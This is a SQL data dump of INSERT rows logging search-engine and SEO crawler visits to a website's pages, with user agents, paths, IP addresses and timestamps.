INSERT INTO `ey_weapp_spider_visit` VALUES ('98191', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/106.html', '66.249.79.112', '1662077329', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98171', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/172.html', '185.191.171.44', '1662073020', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98178', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/132.html', '216.244.66.194', '1662074629', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98339', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/484.html', '66.249.79.108', '1662149489', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98169', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/21.html', '185.191.171.43', '1662072326', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98161', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/492.html', '66.249.79.110', '1662070072', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98183', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '//index.php', '209.141.57.123', '1662075594', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98167', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/110.html', '185.191.171.12', '1662071928', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98154', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/17.html', '66.249.79.110', '1662066975', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98151', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bcxw/list_19_5/', '114.119.151.155', '1662065397', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98148', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/', '66.249.79.112', '1662065124', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98173', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/485.html', '66.249.79.110', '1662073979', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98145', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/223.html', '114.119.151.153', '1662064638', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98137', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/152.html', '66.249.79.112', '1662056549', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98130', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/20_3.html', '185.191.171.23', '1662053966', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98135', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_12/', '185.191.171.12', '1662055428', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98124', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_40/', '114.119.151.155', '1662049368', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98122', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/ptxq.html', '114.119.151.155', '1662049093', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98120', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/buliaoji', '185.191.171.37', '1662047747', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98123', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/368.html', '66.249.79.108', '1662049145', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98117', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_33/', '185.191.171.36', '1662045983', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98118', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_2', '185.191.171.42', '1662046453', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98099', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_4.html', '185.191.171.38', '1662041783', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98097', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/53.html', '114.119.151.155', '1662041353', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98100', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/30.html', '66.249.79.112', '1662041844', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98116', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '223.119.201.6', '1662045925', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98092', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/19.html', '66.249.79.112', '1662039827', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98093', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/', '66.249.79.110', '1662039867', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98091', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/312.html', '66.249.79.110', '1662039718', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98114', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/360.html', '220.181.108.93', '1662045583', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98125', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/385.html', '185.191.171.23', '1662052297', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98072', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/146.html', '185.191.171.22', '1662034535', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98066', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/198.html', '66.249.79.110', '1662034087', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98070', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/435.html', '66.249.79.108', '1662034432', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98149', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/163.html', '116.179.32.17', '1662065220', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98176', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/siping.html', '114.119.151.155', '1662074291', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98090', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/mms.html', '114.119.151.155', '1662039588', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98067', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/198.html', '66.249.79.108', '1662034164', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98115', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '116.179.32.143', '1662045584', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98073', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_32.html', '185.191.171.26', '1662034632', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98098', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/384.html', '114.119.151.153', '1662041678', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98065', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/19.html', '66.249.79.110', '1662033838', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98069', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.112', '1662034413', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98119', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/5_4.html', '185.191.171.39', '1662047596', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98075', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/395.html', '185.191.171.26', '1662034903', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98182', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '209.141.57.123', '1662075593', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98109', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/68.html', '185.191.171.4', '1662043812', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98138', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_14.html', '185.191.171.34', '1662057185', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98128', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/67.html', '66.249.79.108', '1662052916', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98108', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/229.html', '114.119.151.155', '1662043367', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98126', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1662052363', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98186', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/417.html', '114.119.151.153', '1662075914', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98107', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/yulin.html', '114.119.151.155', '1662043117', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98241', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_17/', '185.191.171.9', '1662101458', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98242', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/102.html', '66.249.79.108', '1662104292', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98243', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/207.html', '185.191.171.41', '1662104382', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98086', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/lianyungang.html', '114.119.151.153', '1662037314', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98085', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '1.14.48.115', '1662037167', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98246', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/479.html', '66.249.79.110', '1662107849', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98170', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_47/', '185.191.171.40', '1662072686', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98103', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_29/', '114.119.151.155', '1662042530', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98062', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_62/', '185.191.171.25', '1662025459', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98249', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/74.html', '185.191.171.23', '1662108448', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98105', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '157.55.39.5', '1662042933', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98106', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/155.html', '216.244.66.194', '1662042952', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98063', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/386.html', '185.191.171.8', '1662031077', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98058', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/140_2.html', '185.191.171.35', '1662022637', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98110', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/75.html', '114.119.151.153', '1662043890', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98111', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/24_2.html', '185.191.171.11', '1662044206', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98057', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/57.html', '66.249.79.110', '1662020484', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98251', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_21/', '185.191.171.42', '1662109910', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98051', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/57.html', '66.249.79.112', '1662015141', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98052', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '116.179.32.137', '1662015831', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98255', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/156.html', '114.119.151.155', '1662110917', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98258', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/77.html', '66.249.79.112', '1662111204', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98260', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/shengyangshi.html', '114.119.151.155', '1662111613', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98263', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/398.html', '114.119.151.155', '1662111833', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98265', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/214.html', '66.249.79.112', '1662112368', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98027', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.112', '1662008430', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98026', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/182.html', '185.191.171.11', '1662007995', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98017', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_21/', '216.244.66.194', '1662003592', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98024', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_47/', '66.249.79.110', '1662007622', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98018', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/19.html', '66.249.79.108', '1662004522', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98056', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.110', '1662020269', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98003', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/98.html', '116.179.32.42', '1661996492', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98001', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/', '42.236.10.83', '1661996110', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97996', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '223.119.201.6', '1661991001', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97997', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_65/', '185.191.171.2', '1661991649', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97998', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/97.html', '185.191.171.35', '1661995631', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98031', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/162.html', '185.191.171.4', '1662010253', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98030', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/426.html', '114.119.151.155', '1662010136', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97989', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1661986618', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97990', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/333.html', '116.179.32.83', '1661986675', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97986', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.108', '1661984821', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97985', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '118.184.177.125', '1661984753', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97984', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/wlcb.html', '114.119.151.155', '1661984201', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97987', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_44/', '216.244.66.194', '1661984890', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98006', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/225.html', '66.249.79.108', '1661998185', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98002', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/', '42.236.10.113', '1661996380', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97988', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '175.182.10.221', '1661985506', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98011', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/150.html', '17.121.113.115', '1662000072', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98268', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/182.html', '114.119.151.155', '1662112824', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97981', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/98_5.html', '185.191.171.18', '1661981690', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97979', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/jls.html', '114.119.151.155', '1661980884', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97982', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_11.html', '185.191.171.26', '1661983244', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97978', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_9/', '185.191.171.7', '1661980116', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97975', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/37.html', '116.179.32.209', '1661976855', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98278', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/365.html', '220.181.108.92', '1662120855', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97971', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/yt.html', '114.119.151.153', '1661973160', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97966', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/113.html', '114.119.151.153', '1661971336', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97970', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '154.23.189.227', '1661972772', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97963', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/203.html', '114.119.151.155', '1661969067', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97967', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/439.html', '185.191.171.2', '1661971812', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98281', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '157.55.39.5', '1662123322', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97965', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '40.77.167.5', '1661970114', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97964', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/jincheng.html', '114.119.151.155', '1661969568', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97968', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_24.html', '185.191.171.10', '1661971881', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97958', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/419.html', '185.191.171.37', '1661965195', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97956', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_7', '114.119.151.153', '1661962603', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97973', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/293.html', '114.119.151.153', '1661974571', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97962', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_64/', '216.244.66.194', '1661967547', '0');
